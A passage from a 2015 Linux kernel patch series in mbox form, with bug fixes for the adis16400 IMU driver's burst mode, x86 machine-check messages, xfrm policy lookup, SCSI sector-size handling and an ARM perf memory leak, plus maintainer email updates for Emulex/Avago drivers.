Signed-off-by: Paul Cercueil Signed-off-by: Lars-Peter Clausen Fixes: 5eda3550a3cc ("staging:iio:adis16400: Preallocate transfer message") Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400.h | 1 + drivers/iio/imu/adis16400_core.c | 25 ++++++++++++++++++------- 2 files changed, 19 insertions(+), 7 deletions(-) diff --git a/drivers/iio/imu/adis16400.h b/drivers/iio/imu/adis16400.h index 0916bf6b6c31..1e8fd2e81d45 100644 --- a/drivers/iio/imu/adis16400.h +++ b/drivers/iio/imu/adis16400.h @@ -165,6 +165,7 @@ struct adis16400_state { int filt_int; struct adis adis; + unsigned long avail_scan_mask[2]; }; /* At the moment triggers are only used for ring buffer diff --git a/drivers/iio/imu/adis16400_core.c b/drivers/iio/imu/adis16400_core.c index 7b63788c7d1c..7b06e058b000 100644 --- a/drivers/iio/imu/adis16400_core.c +++ b/drivers/iio/imu/adis16400_core.c @@ -796,11 +796,6 @@ static const struct iio_info adis16400_info = { .debugfs_reg_access = adis_debugfs_reg_access, }; -static const unsigned long adis16400_burst_scan_mask[] = { - ~0UL, - 0, -}; - static const char * const adis16400_status_error_msgs[] = { [ADIS16400_DIAG_STAT_ZACCL_FAIL] = "Z-axis accelerometer self-test failure", [ADIS16400_DIAG_STAT_YACCL_FAIL] = "Y-axis accelerometer self-test failure", @@ -848,6 +843,20 @@ static const struct adis_data adis16400_data = { BIT(ADIS16400_DIAG_STAT_POWER_LOW), }; +static void adis16400_setup_chan_mask(struct adis16400_state *st) +{ + const struct adis16400_chip_info *chip_info = st->variant; + unsigned i; + + for (i = 0; i < chip_info->num_channels; i++) { + const struct iio_chan_spec *ch = &chip_info->channels[i]; + + if (ch->scan_index >= 0 && + ch->scan_index != ADIS16400_SCAN_TIMESTAMP) + st->avail_scan_mask[0] |= BIT(ch->scan_index); + } +} + static int adis16400_probe(struct spi_device *spi) { struct adis16400_state *st; @@ -871,8 +880,10 @@ static int adis16400_probe(struct spi_device *spi) indio_dev->info = &adis16400_info; indio_dev->modes = INDIO_DIRECT_MODE; - if (!(st->variant->flags & ADIS16400_NO_BURST)) - indio_dev->available_scan_masks = adis16400_burst_scan_mask; + if (!(st->variant->flags & ADIS16400_NO_BURST)) { + adis16400_setup_chan_mask(st); + indio_dev->available_scan_masks = st->avail_scan_mask; + } ret = adis_init(&st->adis, indio_dev, spi, &adis16400_data); if (ret) From 9df560350c90f3d3909fe653399b3584c9a17b61 Mon Sep 17 00:00:00 2001 From: Paul Cercueil Date: Fri, 15 May 2015 17:18:37 +0200 Subject: [PATCH 067/872] iio: adis16400: Fix burst mode There are a few issues with the burst mode support. For one we don't setup the rx buffer, so the buffer will never be filled and all samples will read as the zero. Furthermore the tx buffer has the wrong type, which means the driver sends the wrong command and not the right data is returned. The final issue is that in burst mode all channels are transferred. Hence the length of the transfer length should be the number of hardware channels * 2 bytes. Currently the driver uses indio_dev->scan_bytes for this. But if the timestamp channel is enabled the scan_bytes will be larger than the burst length. Fix this by just calculating the burst length based on the number of hardware channels. 
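The resulting SPI buffer layout, sketched with an illustrative channel count (the real number depends on the chip variant):

/*
 *   burst_length = (num_channels - 1) * sizeof(u16)   e.g. (12 - 1) * 2 = 22
 *
 *   adis->buffer: [ burst_length bytes of rx sample data ][ 2-byte tx command ]
 *                   ^ xfer[1].rx_buf                        ^ xfer[0].tx_buf
 *
 * indio_dev->scan_bytes would additionally count the aligned 8-byte
 * timestamp slot, which the device never transmits over the bus.
 */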
Signed-off-by: Paul Cercueil Signed-off-by: Lars-Peter Clausen Fixes: 5eda3550a3cc ("staging:iio:adis16400: Preallocate transfer message") Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400_buffer.c | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/drivers/iio/imu/adis16400_buffer.c b/drivers/iio/imu/adis16400_buffer.c index 6e727ffe5262..629ae84d4e62 100644 --- a/drivers/iio/imu/adis16400_buffer.c +++ b/drivers/iio/imu/adis16400_buffer.c @@ -18,7 +18,8 @@ int adis16400_update_scan_mode(struct iio_dev *indio_dev, { struct adis16400_state *st = iio_priv(indio_dev); struct adis *adis = &st->adis; - uint16_t *tx; + unsigned int burst_length; + u8 *tx; if (st->variant->flags & ADIS16400_NO_BURST) return adis_update_scan_mode(indio_dev, scan_mask); @@ -26,26 +27,27 @@ int adis16400_update_scan_mode(struct iio_dev *indio_dev, kfree(adis->xfer); kfree(adis->buffer); + /* All but the timestamp channel */ + burst_length = (indio_dev->num_channels - 1) * sizeof(u16); + adis->xfer = kcalloc(2, sizeof(*adis->xfer), GFP_KERNEL); if (!adis->xfer) return -ENOMEM; - adis->buffer = kzalloc(indio_dev->scan_bytes + sizeof(u16), - GFP_KERNEL); + adis->buffer = kzalloc(burst_length + sizeof(u16), GFP_KERNEL); if (!adis->buffer) return -ENOMEM; - tx = adis->buffer + indio_dev->scan_bytes; - + tx = adis->buffer + burst_length; tx[0] = ADIS_READ_REG(ADIS16400_GLOB_CMD); tx[1] = 0; adis->xfer[0].tx_buf = tx; adis->xfer[0].bits_per_word = 8; adis->xfer[0].len = 2; - adis->xfer[1].tx_buf = tx; + adis->xfer[1].rx_buf = adis->buffer; adis->xfer[1].bits_per_word = 8; - adis->xfer[1].len = indio_dev->scan_bytes; + adis->xfer[1].len = burst_length; spi_message_init(&adis->msg); spi_message_add_tail(&adis->xfer[0], &adis->msg); From d046ba268adb87c7780494ecf897cbafbf100d57 Mon Sep 17 00:00:00 2001 From: Lars-Peter Clausen Date: Fri, 15 May 2015 17:18:38 +0200 Subject: [PATCH 068/872] iio: adis16400: Fix burst transfer for adis16448 The adis16448, unlike the other chips in this family, in addition to the hardware channels also sends out the DIAG_STAT register in burst mode before them. Handle that case by skipping over the first 2 bytes before we pass the received data to the buffer. 
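Sketched burst frames (word order per the description above, channel counts illustrative), showing why the push into the IIO buffer starts one 16-bit word later on the adis16448:

/*
 *   adis16400 family burst:  [ CH0 ][ CH1 ] ... [ CHn ]
 *   adis16448 burst:         [ DIAG_STAT ][ CH0 ][ CH1 ] ... [ CHn ]
 *
 * so with ADIS16400_BURST_DIAG_STAT set, burst_length grows by
 * sizeof(u16) and the data handed to the IIO buffer starts at
 * adis->buffer + sizeof(u16).
 */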
Signed-off-by: Lars-Peter Clausen Fixes: 76ada52f7f5d ("iio:adis16400: Add support for the adis16448") Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400.h | 1 + drivers/iio/imu/adis16400_buffer.c | 10 +++++++++- drivers/iio/imu/adis16400_core.c | 3 ++- 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/drivers/iio/imu/adis16400.h b/drivers/iio/imu/adis16400.h index 1e8fd2e81d45..73b189c1c0fb 100644 --- a/drivers/iio/imu/adis16400.h +++ b/drivers/iio/imu/adis16400.h @@ -139,6 +139,7 @@ #define ADIS16400_NO_BURST BIT(1) #define ADIS16400_HAS_SLOW_MODE BIT(2) #define ADIS16400_HAS_SERIAL_NUMBER BIT(3) +#define ADIS16400_BURST_DIAG_STAT BIT(4) struct adis16400_state; diff --git a/drivers/iio/imu/adis16400_buffer.c b/drivers/iio/imu/adis16400_buffer.c index 629ae84d4e62..90c24a23c679 100644 --- a/drivers/iio/imu/adis16400_buffer.c +++ b/drivers/iio/imu/adis16400_buffer.c @@ -29,6 +29,8 @@ int adis16400_update_scan_mode(struct iio_dev *indio_dev, /* All but the timestamp channel */ burst_length = (indio_dev->num_channels - 1) * sizeof(u16); + if (st->variant->flags & ADIS16400_BURST_DIAG_STAT) + burst_length += sizeof(u16); adis->xfer = kcalloc(2, sizeof(*adis->xfer), GFP_KERNEL); if (!adis->xfer) @@ -63,6 +65,7 @@ irqreturn_t adis16400_trigger_handler(int irq, void *p) struct adis16400_state *st = iio_priv(indio_dev); struct adis *adis = &st->adis; u32 old_speed_hz = st->adis.spi->max_speed_hz; + void *buffer; int ret; if (!adis->buffer) @@ -83,7 +86,12 @@ irqreturn_t adis16400_trigger_handler(int irq, void *p) spi_setup(st->adis.spi); } - iio_push_to_buffers_with_timestamp(indio_dev, adis->buffer, + if (st->variant->flags & ADIS16400_BURST_DIAG_STAT) + buffer = adis->buffer + sizeof(u16); + else + buffer = adis->buffer; + + iio_push_to_buffers_with_timestamp(indio_dev, buffer, pf->timestamp); iio_trigger_notify_done(indio_dev->trig); diff --git a/drivers/iio/imu/adis16400_core.c b/drivers/iio/imu/adis16400_core.c index 7b06e058b000..2fd68f2219a7 100644 --- a/drivers/iio/imu/adis16400_core.c +++ b/drivers/iio/imu/adis16400_core.c @@ -778,7 +778,8 @@ static struct adis16400_chip_info adis16400_chips[] = { .channels = adis16448_channels, .num_channels = ARRAY_SIZE(adis16448_channels), .flags = ADIS16400_HAS_PROD_ID | - ADIS16400_HAS_SERIAL_NUMBER, + ADIS16400_HAS_SERIAL_NUMBER | + ADIS16400_BURST_DIAG_STAT, .gyro_scale_micro = IIO_DEGREE_TO_RAD(10000), /* 0.01 deg/s */ .accel_scale_micro = IIO_G_TO_M_S_2(833), /* 1/1200 g */ .temp_scale_nano = 73860000, /* 0.07386 C */ From 17fea54bf0ab34fa09a06bbde2f58ed7bbdf9299 Mon Sep 17 00:00:00 2001 From: Borislav Petkov Date: Mon, 18 May 2015 10:07:17 +0200 Subject: [PATCH 069/872] x86/mce: Fix MCE severity messages Derek noticed that a critical MCE gets reported with the wrong error type description: [Hardware Error]: CPU 34: Machine Check Exception: 5 Bank 9: f200003f000100b0 [Hardware Error]: RIP !INEXACT! 10: {intel_idle+0xb1/0x170} [Hardware Error]: TSC 49587b8e321cb [Hardware Error]: PROCESSOR 0:306e4 TIME 1431561296 SOCKET 1 APIC 29 [Hardware Error]: Some CPUs didn't answer in synchronization [Hardware Error]: Machine check: Invalid ^^^^^^^ The last line with 'Invalid' should have printed the high level MCE error type description we get from mce_severity, i.e. something like: [Hardware Error]: Machine check: Action required: data load error in a user process this happens due to the fact that mce_no_way_out() iterates over all MCA banks and possibly overwrites the @msg argument which is used in the panic printing later. 
Change behavior to take the message of only and the (last) critical MCE it detects. Reported-by: Derek Signed-off-by: Borislav Petkov Cc: Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: Tony Luck Link: http://lkml.kernel.org/r/1431936437-25286-3-git-send-email-bp@alien8.de Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/mcheck/mce.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/arch/x86/kernel/cpu/mcheck/mce.c b/arch/x86/kernel/cpu/mcheck/mce.c index e535533d5ab8..20190bdac9d5 100644 --- a/arch/x86/kernel/cpu/mcheck/mce.c +++ b/arch/x86/kernel/cpu/mcheck/mce.c @@ -708,6 +708,7 @@ static int mce_no_way_out(struct mce *m, char **msg, unsigned long *validp, struct pt_regs *regs) { int i, ret = 0; + char *tmp; for (i = 0; i < mca_cfg.banks; i++) { m->status = mce_rdmsrl(MSR_IA32_MCx_STATUS(i)); @@ -716,9 +717,11 @@ static int mce_no_way_out(struct mce *m, char **msg, unsigned long *validp, if (quirk_no_way_out) quirk_no_way_out(i, m, regs); } - if (mce_severity(m, mca_cfg.tolerant, msg, true) >= - MCE_PANIC_SEVERITY) + + if (mce_severity(m, mca_cfg.tolerant, &tmp, true) >= MCE_PANIC_SEVERITY) { + *msg = tmp; ret = 1; + } } return ret; } From 8faf491e642011f449d6405be52bedb70964aed6 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Thu, 14 May 2015 11:16:59 +0800 Subject: [PATCH 070/872] xfrm: optimise to search the inexact policy list The policies are organized into list by priority ascent of policy, so it is unnecessary to continue to loop the policy if the priority of current looped police is larger than or equal priority which is from the policy_bydst list. This allows to match policy with ~0U priority in inexact list too. Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index 3d264e5e7409..18cead7645be 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -1114,6 +1114,9 @@ static struct xfrm_policy *xfrm_policy_lookup_bytype(struct net *net, u8 type, } chain = &net->xfrm.policy_inexact[dir]; hlist_for_each_entry(pol, chain, bydst) { + if ((pol->priority >= priority) && ret) + break; + err = xfrm_policy_match(pol, fl, type, family, dir); if (err) { if (err == -ESRCH) @@ -1122,7 +1125,7 @@ static struct xfrm_policy *xfrm_policy_lookup_bytype(struct net *net, u8 type, ret = ERR_PTR(err); goto fail; } - } else if (pol->priority < priority) { + } else { ret = pol; break; } @@ -3203,9 +3206,11 @@ static struct xfrm_policy *xfrm_migrate_policy_find(const struct xfrm_selector * } chain = &net->xfrm.policy_inexact[dir]; hlist_for_each_entry(pol, chain, bydst) { + if ((pol->priority >= priority) && ret) + break; + if (xfrm_migrate_selector_match(sel, &pol->selector) && - pol->type == type && - pol->priority < priority) { + pol->type == type) { ret = pol; break; } From ea8e080b604e2c8221af778221d83a59b6529c5b Mon Sep 17 00:00:00 2001 From: Aravind Gopalakrishnan Date: Mon, 18 May 2015 10:07:16 +0200 Subject: [PATCH 071/872] x86/Documentation: Update the contact email for L3 cache index disable functionality The mailing list discuss@x86-64.org is now defunct. Use the lkml in its place. Signed-off-by: Aravind Gopalakrishnan Signed-off-by: Borislav Petkov Cc: Greg KH Cc: H. 
Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: linux-api@vger.kernel.org Cc: sboyd@codeaurora.org Cc: sudeep.holla@arm.com Link: http://lkml.kernel.org/r/1431125098-9470-1-git-send-email-Aravind.Gopalakrishnan@amd.com Link: http://lkml.kernel.org/r/1431936437-25286-2-git-send-email-bp@alien8.de [ Changed the contact email to lkml. ] Signed-off-by: Ingo Molnar --- Documentation/ABI/testing/sysfs-devices-system-cpu | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Documentation/ABI/testing/sysfs-devices-system-cpu b/Documentation/ABI/testing/sysfs-devices-system-cpu index 99983e67c13c..da95513571ea 100644 --- a/Documentation/ABI/testing/sysfs-devices-system-cpu +++ b/Documentation/ABI/testing/sysfs-devices-system-cpu @@ -162,7 +162,7 @@ Description: Discover CPUs in the same CPU frequency coordination domain What: /sys/devices/system/cpu/cpu*/cache/index3/cache_disable_{0,1} Date: August 2008 KernelVersion: 2.6.27 -Contact: discuss@x86-64.org +Contact: Linux kernel mailing list Description: Disable L3 cache indices These files exist in every CPU's cache/index3 directory. Each From 74856fbf441929918c49ff262ace9835048e4e6a Mon Sep 17 00:00:00 2001 From: Mark Hounschell Date: Wed, 13 May 2015 10:49:09 +0200 Subject: [PATCH 072/872] sd: Disable support for 256 byte/sector disks 256 bytes per sector support has been broken since 2.6.X, and no-one stepped up to fix this. So disable support for it. Signed-off-by: Mark Hounschell Signed-off-by: Hannes Reinecke Cc: stable@vger.kernel.org Signed-off-by: James Bottomley --- drivers/scsi/sd.c | 19 +++++-------------- 1 file changed, 5 insertions(+), 14 deletions(-) diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c index 79beebf53302..7f9d65fe4fd9 100644 --- a/drivers/scsi/sd.c +++ b/drivers/scsi/sd.c @@ -1600,6 +1600,7 @@ static unsigned int sd_completed_bytes(struct scsi_cmnd *scmd) { u64 start_lba = blk_rq_pos(scmd->request); u64 end_lba = blk_rq_pos(scmd->request) + (scsi_bufflen(scmd) / 512); + u64 factor = scmd->device->sector_size / 512; u64 bad_lba; int info_valid; /* @@ -1621,16 +1622,9 @@ static unsigned int sd_completed_bytes(struct scsi_cmnd *scmd) if (scsi_bufflen(scmd) <= scmd->device->sector_size) return 0; - if (scmd->device->sector_size < 512) { - /* only legitimate sector_size here is 256 */ - start_lba <<= 1; - end_lba <<= 1; - } else { - /* be careful ... don't want any overflows */ - unsigned int factor = scmd->device->sector_size / 512; - do_div(start_lba, factor); - do_div(end_lba, factor); - } + /* be careful ... don't want any overflows */ + do_div(start_lba, factor); + do_div(end_lba, factor); /* The bad lba was reported incorrectly, we have no idea where * the error is. 
@@ -2188,8 +2182,7 @@ sd_read_capacity(struct scsi_disk *sdkp, unsigned char *buffer) if (sector_size != 512 && sector_size != 1024 && sector_size != 2048 && - sector_size != 4096 && - sector_size != 256) { + sector_size != 4096) { sd_printk(KERN_NOTICE, sdkp, "Unsupported sector size %d.\n", sector_size); /* @@ -2244,8 +2237,6 @@ sd_read_capacity(struct scsi_disk *sdkp, unsigned char *buffer) sdkp->capacity <<= 2; else if (sector_size == 1024) sdkp->capacity <<= 1; - else if (sector_size == 256) - sdkp->capacity >>= 1; blk_queue_physical_block_size(sdp->request_queue, sdkp->physical_block_size); From 4627de932d5528ede89ee3ea84ef6339a906e58d Mon Sep 17 00:00:00 2001 From: Minh Tran Date: Thu, 14 May 2015 23:16:17 -0700 Subject: [PATCH 073/872] MAINTAINERS, be2iscsi: change email domain be2iscsi change of ownership from Emulex to Avago Technologies recently. We like to get the following updates in: changed "Emulex" to "Avago Technologies", changed email addresses from "emulex.com" to "avagotech.com", updated MAINTAINER list for be2iscsi driver. Signed-off-by: Minh Tran Signed-off-by: Jayamohan Kallickal Signed-off-by: James Bottomley --- MAINTAINERS | 6 ++++-- drivers/scsi/be2iscsi/be.h | 6 +++--- drivers/scsi/be2iscsi/be_cmds.c | 6 +++--- drivers/scsi/be2iscsi/be_cmds.h | 6 +++--- drivers/scsi/be2iscsi/be_iscsi.c | 8 ++++---- drivers/scsi/be2iscsi/be_iscsi.h | 8 ++++---- drivers/scsi/be2iscsi/be_main.c | 12 ++++++------ drivers/scsi/be2iscsi/be_main.h | 10 +++++----- drivers/scsi/be2iscsi/be_mgmt.c | 8 ++++---- drivers/scsi/be2iscsi/be_mgmt.h | 8 ++++---- 10 files changed, 40 insertions(+), 38 deletions(-) diff --git a/MAINTAINERS b/MAINTAINERS index 2e5bbc0d68b2..2c6926d2776a 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -8794,9 +8794,11 @@ F: drivers/misc/phantom.c F: include/uapi/linux/phantom.h SERVER ENGINES 10Gbps iSCSI - BladeEngine 2 DRIVER -M: Jayamohan Kallickal +M: Jayamohan Kallickal +M: Minh Tran +M: John Soni Jose L: linux-scsi@vger.kernel.org -W: http://www.emulex.com +W: http://www.avagotech.com S: Supported F: drivers/scsi/be2iscsi/ diff --git a/drivers/scsi/be2iscsi/be.h b/drivers/scsi/be2iscsi/be.h index 81e83a65a193..32070099c333 100644 --- a/drivers/scsi/be2iscsi/be.h +++ b/drivers/scsi/be2iscsi/be.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -8,9 +8,9 @@ * Public License is included in this distribution in the file called COPYING. * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_cmds.c b/drivers/scsi/be2iscsi/be_cmds.c index 1028760b8a22..447cf7ce606e 100644 --- a/drivers/scsi/be2iscsi/be_cmds.c +++ b/drivers/scsi/be2iscsi/be_cmds.c @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -8,9 +8,9 @@ * Public License is included in this distribution in the file called COPYING. 
* * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_cmds.h b/drivers/scsi/be2iscsi/be_cmds.h index 98897434bcb4..f11d325fe696 100644 --- a/drivers/scsi/be2iscsi/be_cmds.h +++ b/drivers/scsi/be2iscsi/be_cmds.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -8,9 +8,9 @@ * Public License is included in this distribution in the file called COPYING. * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_iscsi.c b/drivers/scsi/be2iscsi/be_iscsi.c index b7391a3f9f0b..2f0700796842 100644 --- a/drivers/scsi/be2iscsi/be_iscsi.c +++ b/drivers/scsi/be2iscsi/be_iscsi.c @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_iscsi.h b/drivers/scsi/be2iscsi/be_iscsi.h index e0b3b2d1f27a..0c84e1c0763a 100644 --- a/drivers/scsi/be2iscsi/be_iscsi.h +++ b/drivers/scsi/be2iscsi/be_iscsi.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_main.c b/drivers/scsi/be2iscsi/be_main.c index 923a2b5a2439..1f74760ce86c 100644 --- a/drivers/scsi/be2iscsi/be_main.c +++ b/drivers/scsi/be2iscsi/be_main.c @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. 
* - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ @@ -50,7 +50,7 @@ static unsigned int enable_msix = 1; MODULE_DESCRIPTION(DRV_DESC " " BUILD_STR); MODULE_VERSION(BUILD_STR); -MODULE_AUTHOR("Emulex Corporation"); +MODULE_AUTHOR("Avago Technologies"); MODULE_LICENSE("GPL"); module_param(be_iopoll_budget, int, 0); module_param(enable_msix, int, 0); @@ -552,7 +552,7 @@ MODULE_DEVICE_TABLE(pci, beiscsi_pci_id_table); static struct scsi_host_template beiscsi_sht = { .module = THIS_MODULE, - .name = "Emulex 10Gbe open-iscsi Initiator Driver", + .name = "Avago Technologies 10Gbe open-iscsi Initiator Driver", .proc_name = DRV_NAME, .queuecommand = iscsi_queuecommand, .change_queue_depth = scsi_change_queue_depth, diff --git a/drivers/scsi/be2iscsi/be_main.h b/drivers/scsi/be2iscsi/be_main.h index 7ee0ffc38514..e70ea26bbc2b 100644 --- a/drivers/scsi/be2iscsi/be_main.h +++ b/drivers/scsi/be2iscsi/be_main.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ @@ -37,7 +37,7 @@ #define DRV_NAME "be2iscsi" #define BUILD_STR "10.4.114.0" -#define BE_NAME "Emulex OneConnect" \ +#define BE_NAME "Avago Technologies OneConnect" \ "Open-iSCSI Driver version" BUILD_STR #define DRV_DESC BE_NAME " " "Driver" diff --git a/drivers/scsi/be2iscsi/be_mgmt.c b/drivers/scsi/be2iscsi/be_mgmt.c index 681d4e8f003a..c2c4d6975fb7 100644 --- a/drivers/scsi/be2iscsi/be_mgmt.c +++ b/drivers/scsi/be2iscsi/be_mgmt.c @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_mgmt.h b/drivers/scsi/be2iscsi/be_mgmt.h index bd81446936fc..9356b9a86b66 100644 --- a/drivers/scsi/be2iscsi/be_mgmt.h +++ b/drivers/scsi/be2iscsi/be_mgmt.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. 
* - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ From 32505876c0947a4cecc409dfbef1fc58ced6138d Mon Sep 17 00:00:00 2001 From: James Smart Date: Fri, 15 May 2015 13:10:58 -0400 Subject: [PATCH 074/872] MAINTAINERS: Revise lpfc maintainers for Avago Technologies ownership of Emulex The old email addresses will go away very soon. Revising with new addresses. Signed-off-by: Dick Kennedy Signed-off-by: James Smart Signed-off-by: James Bottomley --- MAINTAINERS | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/MAINTAINERS b/MAINTAINERS index 2c6926d2776a..d42115a6de2b 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -3803,10 +3803,11 @@ M: David Woodhouse L: linux-embedded@vger.kernel.org S: Maintained -EMULEX LPFC FC SCSI DRIVER -M: James Smart +EMULEX/AVAGO LPFC FC/FCOE SCSI DRIVER +M: James Smart +M: Dick Kennedy L: linux-scsi@vger.kernel.org -W: http://sourceforge.net/projects/lpfcxxxx +W: http://www.avagotech.com S: Supported F: drivers/scsi/lpfc/ From 8d2812849acbc13c07bdad8a0a55a342ec1ce3a4 Mon Sep 17 00:00:00 2001 From: Will Deacon Date: Thu, 14 May 2015 18:07:44 +0100 Subject: [PATCH 075/872] ARM: 8357/1: perf: fix memory leak when probing PMU PPIs Commit 338d9dd3e2ae ("ARM: 8351/1: perf: don't warn about missing interrupt-affinity property for PPIs") added a check for PPIs so that we avoid parsing the interrupt-affinity property for these naturally affine interrupts. Unfortunately, this check can trigger an early (successful) return and we will leak the irqs array. This patch fixes the issue by reordering the code so that the check is performed before any independent allocation. 
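The shape of the leak and of the reordering fix, reduced to pseudo-code (the helper name is a placeholder; the real change is in the perf_event_cpu.c hunk below):

/* Leaky ordering: the early-return path never frees irqs. */
irqs = kcalloc(num_resources, sizeof(*irqs), GFP_KERNEL);
if (!irqs)
	return -ENOMEM;
if (first_irq_is_percpu())	/* placeholder for the PPI check */
	return 0;		/* <-- irqs leaked here */

/* Fixed ordering: do the cheap check first, allocate only if needed. */
if (first_irq_is_percpu())
	return 0;
irqs = kcalloc(num_resources, sizeof(*irqs), GFP_KERNEL);
if (!irqs)
	return -ENOMEM;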
Reported-by: David Binderman Signed-off-by: Will Deacon Signed-off-by: Russell King --- arch/arm/kernel/perf_event_cpu.c | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/arch/arm/kernel/perf_event_cpu.c b/arch/arm/kernel/perf_event_cpu.c index 213919ba326f..3b8c2833c537 100644 --- a/arch/arm/kernel/perf_event_cpu.c +++ b/arch/arm/kernel/perf_event_cpu.c @@ -304,16 +304,17 @@ static int probe_current_pmu(struct arm_pmu *pmu) static int of_pmu_irq_cfg(struct platform_device *pdev) { int i, irq; - int *irqs = kcalloc(pdev->num_resources, sizeof(*irqs), GFP_KERNEL); - - if (!irqs) - return -ENOMEM; + int *irqs; /* Don't bother with PPIs; they're already affine */ irq = platform_get_irq(pdev, 0); if (irq >= 0 && irq_is_percpu(irq)) return 0; + irqs = kcalloc(pdev->num_resources, sizeof(*irqs), GFP_KERNEL); + if (!irqs) + return -ENOMEM; + for (i = 0; i < pdev->num_resources; ++i) { struct device_node *dn; int cpu; From 